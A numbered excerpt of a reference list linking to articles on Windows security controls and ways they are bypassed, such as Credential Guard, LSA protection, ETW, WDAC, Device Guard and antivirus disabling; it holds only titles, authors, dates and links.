    602 * [Attack surface reduction rules reference - Microsoft 365 - November 30, 2023](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide)
    603 * [Catching Credential Guard Off Guard - Valdemar Carøe - October 23, 2025](https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/)
    604 * [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - Microsoft - December 9, 2022](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate)
    605 * [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - Microsoft - March 10, 2023](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context)
    606 * [DISABLING AV WITH PROCESS SUSPENSION - Christopher Paschen - March 24, 2023](https://www.trustedsec.com/blog/disabling-av-with-process-suspension/)
    607 * [Disabling Event Tracing For Windows - UNPROTECT Project - April 19, 2022](https://unprotect.it/technique/disabling-event-tracing-for-windows-etw/)
    608 * [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - April 7, 2021](https://itm4n.github.io/lsass-runasppl/)
    609 * [ETW: Event Tracing for Windows 101 - ired.team - January 6, 2020](https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/etw-event-tracing-for-windows-101)
    610 * [PowerShell about_Logging_Windows - Microsoft Documentation - September 30, 2025](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)
    611 * [Remove Windows Defender Application Control (WDAC) policies - Microsoft - December 9, 2022](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/disable-windows-defender-application-control-policies)
    612 * [Sneaking Past Device Guard - Cybereason - Philip Tsukerman - December 4, 2022](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)